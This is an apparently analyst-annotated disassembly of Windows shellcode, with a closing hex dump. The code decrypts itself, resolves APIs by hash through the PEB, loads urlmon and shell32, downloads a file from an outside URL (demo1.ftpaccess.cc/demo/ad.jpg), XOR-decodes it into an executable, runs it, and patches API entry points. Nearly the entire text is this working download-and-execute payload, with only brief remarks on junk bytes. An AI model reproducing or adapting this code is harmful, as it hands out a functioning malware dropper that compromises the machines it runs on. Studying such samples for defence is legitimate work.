self-decrypt: 00000000 90 nop 00000001 90 nop 00000002 EB19 jmp short 0x1d 00000004 5B pop ebx 00000005 4B dec ebx 00000006 90 nop 00000007 33C9 xor ecx,ecx 00000009 90 nop 0000000A 807B01E9 cmp byte [ebx+0x1],0xe9 0000000E 7501 jnz 0x11 00000010 C3 ret 00000011 66B97B04 mov cx,0x47b 00000015 80340BD8 xor byte [ebx+ecx],0xd8 00000019 E2FA loop 0x15 0000001B EB05 jmp short 0x22 0000001D E8E2FFFFFF call 0x4 entry: 00000022 E9E1030000 jmp 0x408 00000027 5F pop edi 00000028 64A130000000 mov eax,[fs:0x30] 0000002E 8B400C mov eax,[eax+0xc] 00000031 8B701C mov esi,[eax+0x1c] 00000034 AD lodsd 00000035 8B6808 mov ebp,[eax+0x8] 00000038 8BF7 mov esi,edi 0000003A 6A0F push byte +0xf 0000003C 59 pop ecx 0000003D E881030000 call 0x3c3 00000042 90 nop 00000043 E2F8 loop 0x3d 00000045 6833320000 push dword 0x3233 0000004A 6855736572 push dword 0x72657355 0000004F 54 push esp 00000050 8B460C mov eax,[esi+0xc] 00000053 E8EF020000 call 0x347 00000058 8BE8 mov ebp,eax 0000005A 6A01 push byte +0x1 0000005C 59 pop ecx 0000005D E861030000 call 0x3c3 00000062 E2F9 loop 0x5d 00000064 686F6E0000 push dword 0x6e6f 00000069 6875726C6D push dword 0x6d6c7275 0000006E 54 push esp 0000006F 8B460C mov eax,[esi+0xc] 00000072 E8D0020000 call 0x347 00000077 8BE8 mov ebp,eax 00000079 6A01 push byte +0x1 0000007B 59 pop ecx 0000007C E842030000 call 0x3c3 00000081 E2F9 loop 0x7c 00000083 686C333200 push dword 0x32336c 00000088 687368656C push dword 0x6c656873 0000008D 54 push esp 0000008E 8B460C mov eax,[esi+0xc] 00000091 E8B1020000 call 0x347 00000096 8BE8 mov ebp,eax 00000098 6A01 push byte +0x1 0000009A 59 pop ecx 0000009B E823030000 call 0x3c3 000000A0 E2F9 loop 0x9b 000000A2 81EC00010000 sub esp,0x100 000000A8 8BDC mov ebx,esp 000000AA 81C380000000 add ebx,0x80 000000B0 6A00 push byte +0x0 000000B2 6A1A push byte +0x1a 000000B4 53 push ebx 000000B5 6A00 push byte +0x0 000000B7 FF5644 call near [esi+0x44] 000000BA 33C0 xor eax,eax 000000BC 40 inc eax 000000BD 803C0300 cmp byte [ebx+eax],0x0 
000000C1 75F9 jnz 0xbc 000000C3 898690000000 mov [esi+0x90],eax 000000C9 C704035C612E65 mov dword [ebx+eax],0x652e615c 000000D0 C744030478650000 mov dword [ebx+eax+0x4],0x6578 000000D8 33C9 xor ecx,ecx 000000DA 51 push ecx 000000DB 51 push ecx 000000DC 53 push ebx 000000DD 57 push edi 000000DE 51 push ecx 000000DF 33C0 xor eax,eax 000000E1 8B4640 mov eax,[esi+0x40] 000000E4 E85E020000 call 0x347 000000E9 83F800 cmp eax,byte +0x0 000000EC 0F857F010000 jnz near 0x271 000000F2 6A00 push byte +0x0 000000F4 6A00 push byte +0x0 000000F6 6A03 push byte +0x3 000000F8 6A00 push byte +0x0 000000FA 6A02 push byte +0x2 000000FC 68000000C0 push dword 0xc0000000 00000101 53 push ebx 00000102 8B4624 mov eax,[esi+0x24] 00000105 E83D020000 call 0x347 0000010A 83F8FF cmp eax,byte -0x1 0000010D 0F845E010000 jz near 0x271 00000113 894660 mov [esi+0x60],eax 00000116 6A00 push byte +0x0 00000118 50 push eax 00000119 FF5628 call near [esi+0x28] 0000011C 894664 mov [esi+0x64],eax 0000011F 8B8690000000 mov eax,[esi+0x90] 00000125 C704035C622E65 mov dword [ebx+eax],0x652e625c 0000012C C744030478650000 mov dword [ebx+eax+0x4],0x6578 00000134 6A00 push byte +0x0 00000136 6A00 push byte +0x0 00000138 6A02 push byte +0x2 0000013A 6A00 push byte +0x0 0000013C 6A00 push byte +0x0 0000013E 6800000040 push dword 0x40000000 00000143 53 push ebx 00000144 8B4624 mov eax,[esi+0x24] 00000147 E8FB010000 call 0x347 0000014C 83F8FF cmp eax,byte -0x1 0000014F 0F841C010000 jz near 0x271 00000155 898684000000 mov [esi+0x84],eax 0000015B 899E8C000000 mov [esi+0x8c],ebx 00000161 8B4660 mov eax,[esi+0x60] 00000164 6A00 push byte +0x0 00000166 6A00 push byte +0x0 00000168 6A00 push byte +0x0 0000016A 8B4660 mov eax,[esi+0x60] 0000016D 50 push eax 0000016E FF5638 call near [esi+0x38] 00000171 C7467000000000 mov dword [esi+0x70],0x0 00000178 C7467400000000 mov dword [esi+0x74],0x0 0000017F 81C700020000 add edi,0x200 00000185 33DB xor ebx,ebx 00000187 8B5E64 mov ebx,[esi+0x64] 0000018A 6A00 push byte +0x0 0000018C 
8D4670 lea eax,[esi+0x70] 0000018F 50 push eax 00000190 6800040000 push dword 0x400 00000195 57 push edi 00000196 FF7660 push dword [esi+0x60] 00000199 FF5604 call near [esi+0x4] 0000019C 33C9 xor ecx,ecx 0000019E B900040000 mov ecx,0x400 000001A3 807C0FFF95 cmp byte [edi+ecx-0x1],0x95 000001A8 740C jz 0x1b6 000001AA 807C0FFF00 cmp byte [edi+ecx-0x1],0x0 000001AF 7405 jz 0x1b6 000001B1 80740FFF95 xor byte [edi+ecx-0x1],0x95 000001B6 E2EB loop 0x1a3 000001B8 8BC3 mov eax,ebx 000001BA 2D00040000 sub eax,0x400 000001BF 83F800 cmp eax,byte +0x0 000001C2 7F03 jg 0x1c7 000001C4 895E70 mov [esi+0x70],ebx 000001C7 6A00 push byte +0x0 000001C9 8D4674 lea eax,[esi+0x74] 000001CC 50 push eax 000001CD FF7670 push dword [esi+0x70] 000001D0 57 push edi 000001D1 FFB684000000 push dword [esi+0x84] 000001D7 FF5630 call near [esi+0x30] 000001DA 81EB00040000 sub ebx,0x400 000001E0 83FB00 cmp ebx,byte +0x0 000001E3 7FA5 jg 0x18a 000001E5 FF7660 push dword [esi+0x60] 000001E8 FF5634 call near [esi+0x34] 000001EB FFB684000000 push dword [esi+0x84] 000001F1 FF5634 call near [esi+0x34] 000001F4 8B8690000000 mov eax,[esi+0x90] 000001FA 8B9E8C000000 mov ebx,[esi+0x8c] 00000200 C704035C612E65 mov dword [ebx+eax],0x652e615c 00000207 53 push ebx 00000208 FF562C call near [esi+0x2c] 0000020B 8BBE8C000000 mov edi,[esi+0x8c] 00000211 8B8690000000 mov eax,[esi+0x90] 00000217 C704075C622E65 mov dword [edi+eax],0x652e625c 0000021E 81EC00010000 sub esp,0x100 00000224 8BDC mov ebx,esp 00000226 6800010000 push dword 0x100 0000022B 53 push ebx 0000022C 6800010000 push dword 0x100 00000231 57 push edi 00000232 6A00 push byte +0x0 00000234 6A00 push byte +0x0 00000236 FF561C call near [esi+0x1c] 00000239 8BFB mov edi,ebx 0000023B 33C0 xor eax,eax 0000023D 33DB xor ebx,ebx 0000023F 81EC00020000 sub esp,0x200 00000245 8BCC mov ecx,esp 00000247 83F854 cmp eax,byte +0x54 0000024A 7D08 jnl 0x254 0000024C 891C01 mov [ecx+eax],ebx 0000024F 83C004 add eax,byte +0x4 00000252 EBF3 jmp short 0x247 00000254 8BCC mov 
ecx,esp 00000256 8BD9 mov ebx,ecx 00000258 83C310 add ebx,byte +0x10 0000025B 33C0 xor eax,eax 0000025D 50 push eax 0000025E 51 push ecx 0000025F 53 push ebx 00000260 50 push eax 00000261 50 push eax 00000262 50 push eax 00000263 50 push eax 00000264 50 push eax 00000265 50 push eax 00000266 57 push edi 00000267 50 push eax 00000268 50 push eax 00000269 8B4608 mov eax,[esi+0x8] 0000026C E8F7000000 call 0x368 00000271 8B7E3C mov edi,[esi+0x3c] 00000274 E834010000 call 0x3ad 00000279 E837000000 call 0x2b5 0000027E 6863767700 push dword 0x777663 00000283 687368646F push dword 0x6f646873 00000288 54 push esp 00000289 8B460C mov eax,[esi+0xc] 0000028C E8B6000000 call 0x347 00000291 89463C mov [esi+0x3c],eax 00000294 64A104000000 mov eax,[fs:0x4] 0000029A 8DA060FFFFFF lea esp,[eax+0xffffff60] 000002A0 6A65 push byte +0x65 000002A2 FF763C push dword [esi+0x3c] 000002A5 8B4610 mov eax,[esi+0x10] 000002A8 E89A000000 call 0x347 000002AD 33DB xor ebx,ebx 000002AF 53 push ebx 000002B0 53 push ebx 000002B1 53 push ebx 000002B2 53 push ebx 000002B3 FFD0 call eax 000002B5 E8E5000000 call 0x39f 000002BA 81EC00010000 sub esp,0x100 000002C0 8BFC mov edi,esp 000002C2 83C704 add edi,byte +0x4 000002C5 C7073274910C mov dword [edi],0xc917432 000002CB C747046389D14F mov dword [edi+0x4],0x4fd18963 000002D2 C74708A06597CB mov dword [edi+0x8],0xcb9765a0 000002D9 C7470C5140BA7F mov dword [edi+0xc],0x7fba4051 000002E0 C747103E1DB639 mov dword [edi+0x10],0x39b61d3e 000002E7 C74714B869D41B mov dword [edi+0x14],0x1bd469b8 000002EE C74718BE7F66A0 mov dword [edi+0x18],0xa0667fbe 000002F5 C7471CFCA937AD mov dword [edi+0x1c],0xad37a9fc 000002FC C74720980A10F8 mov dword [edi+0x20],0xf8100a98 00000303 64A130000000 mov eax,[fs:0x30] 00000309 8B400C mov eax,[eax+0xc] 0000030C 8B701C mov esi,[eax+0x1c] 0000030F AD lodsd 00000310 8B6808 mov ebp,[eax+0x8] 00000313 8BF7 mov esi,edi 00000315 895664 mov [esi+0x64],edx 00000318 6A04 push byte +0x4 0000031A 59 pop ecx 0000031B E8A3000000 call 0x3c3 00000320 90 
nop 00000321 E2F8 loop 0x31b 00000323 6833320000 push dword 0x3233 00000328 6855736572 push dword 0x72657355 0000032D 54 push esp 0000032E 8B06 mov eax,[esi] 00000330 E812000000 call 0x347 00000335 8BE8 mov ebp,eax 00000337 6A05 push byte +0x5 00000339 59 pop ecx 0000033A E884000000 call 0x3c3 0000033F E2F9 loop 0x33a 00000341 33FF xor edi,edi 00000343 57 push edi 00000344 FF5604 call near [esi+0x4] 00000347 8038E8 cmp byte [eax],0xe8 0000034A 8038E9 cmp byte [eax],0xe9 0000034D 7511 jnz 0x360 0000034F 81780590909090 cmp dword [eax+0x5],0x90909090 00000356 7408 jz 0x360 00000358 8BFF mov edi,edi 0000035A 55 push ebp 0000035B 8BEC mov ebp,esp 0000035D 8D4005 lea eax,[eax+0x5] 00000360 FFE0 jmp eax 00000362 E838000000 call 0x39f 00000367 C3 ret 00000368 8038E8 cmp byte [eax],0xe8 0000036B 8038E9 cmp byte [eax],0xe9 0000036E 7511 jnz 0x381 00000370 81780590909090 cmp dword [eax+0x5],0x90909090 00000377 74E7 jz 0x360 00000379 68080A0000 push dword 0xa08 0000037E 8D4005 lea eax,[eax+0x5] 00000381 FFE0 jmp eax 00000383 E817000000 call 0x39f 00000388 C3 ret 00000389 E811000000 call 0x39f 0000038E B811010480 mov eax,0x80040111 00000393 C20C00 ret 0xc 00000396 EB02 jmp short 0x39a 00000398 58 pop eax 00000399 C3 ret 0000039A E8F9FFFFFF call 0x398 0000039F 5B pop ebx 000003A0 C607B8 mov byte [edi],0xb8 000003A3 895F01 mov [edi+0x1],ebx 000003A6 66C74705FFE0 mov word [edi+0x5],0xe0ff 000003AC C3 ret 000003AD 53 push ebx 000003AE 8BDC mov ebx,esp 000003B0 53 push ebx 000003B1 6A40 push byte +0x40 000003B3 6800100000 push dword 0x1000 000003B8 57 push edi 000003B9 8B4620 mov eax,[esi+0x20] 000003BC E886FFFFFF call 0x347 000003C1 58 pop eax 000003C2 C3 ret 000003C3 51 push ecx 000003C4 56 push esi 000003C5 8B753C mov esi,[ebp+0x3c] 000003C8 8B742E78 mov esi,[esi+ebp+0x78] 000003CC 03F5 add esi,ebp 000003CE 56 push esi 000003CF 8B7620 mov esi,[esi+0x20] 000003D2 03F5 add esi,ebp 000003D4 33C9 xor ecx,ecx 000003D6 49 dec ecx 000003D7 41 inc ecx 000003D8 AD lodsd 000003D9 03C5 add 
eax,ebp 000003DB 33DB xor ebx,ebx 000003DD 0FBE10 movsx edx,byte [eax] 000003E0 3AD6 cmp dl,dh 000003E2 7408 jz 0x3ec 000003E4 C1CB07 ror ebx,0x7 000003E7 03DA add ebx,edx 000003E9 40 inc eax 000003EA EBF1 jmp short 0x3dd 000003EC 3B1F cmp ebx,[edi] 000003EE 75E7 jnz 0x3d7 000003F0 5E pop esi 000003F1 8B5E24 mov ebx,[esi+0x24] 000003F4 03DD add ebx,ebp 000003F6 668B0C4B mov cx,[ebx+ecx*2] 000003FA 8B5E1C mov ebx,[esi+0x1c] 000003FD 03DD add ebx,ebp 000003FF 8B048B mov eax,[ebx+ecx*4] 00000402 03C5 add eax,ebp 00000404 AB stosd 00000405 5E pop esi 00000406 59 pop ecx 00000407 C3 ret 00000408 E81AFCFFFF call 0x27 0000040D B2F2 mov dl,0xf2 0000040F E2F4 loop 0x405 00000411 B236 mov dl,0x36 00000413 0F13F0 umov esi,eax 00000416 48 dec eax 00000417 7B3D jpo 0x456 00000419 3274910C xor dh,[ecx+edx*4+0xc] 0000041D 85DF test edi,ebx 0000041F AF scasd 00000420 BB6389D14F mov ebx,0x4fd18963 00000425 51 push ecx 00000426 40 inc eax 00000427 BA7F079222 mov edx,0x2292077f 0000042C 701E jo 0x44c (this section is probably junk: these bytes do not decode as meaningful code) 0000042E A4 movsb 0000042F 64EF fs out dx,eax 00000431 93 xchg eax,ebx 00000432 32E4 xor ah,ah 00000434 94 xchg eax,esp 00000435 8E13 mov ss,[ebx] 00000437 0AAC7939E698C4 or ch,[ecx+edi*2+0xc498e639] 0000043E 8D1F lea ebx,[edi] 00000440 7457 jz 0x499 00000442 660DFF43 or ax,0x43ff 00000446 BEACDB980A mov esi,0xa98dbac 0000044B 10F8 adc al,bh 0000044D 80D6AF adc dh,0xaf 00000450 9AFB5315666874 call 0x7468:0x661553fb (since there is a jump to 0x44c, the alternate decode starting at that offset follows; it is not much more helpful) 0000044C F8 clc 0000044D 80D6AF adc dh,0xaf 00000450 9AFB5315666874 call 0x7468:0x661553fb 00000410 f4 b2 36 0f 13 f0 48 7b 3d 32 74 91 0c 85 df af |..6...H{=2t.....| 00000420 bb 63 89 d1 4f 51 40 ba 7f 07 92 22 70 1e a4 64 |.c..OQ@...."p..d| 00000430 ef 93 32 e4 94 8e 13 0a ac 79 39 e6 98 c4 8d 1f |..2......y9.....| 00000440 74 57 66 0d ff 43 be ac db 98 0a 10 f8 80 d6 af |tWf..C..........| 00000450 9a fb 53 15 66 68 74 74 70 3a 2f 2f 64 65 6d 6f |..S.fhttp://demo| 
00000460 31 2e 66 74 70 61 63 63 65 73 73 2e 63 63 2f 64 |1.ftpaccess.cc/d| 00000470 65 6d 6f 2f 61 64 2e 6a 70 67 00 |emo/ad.jpg. |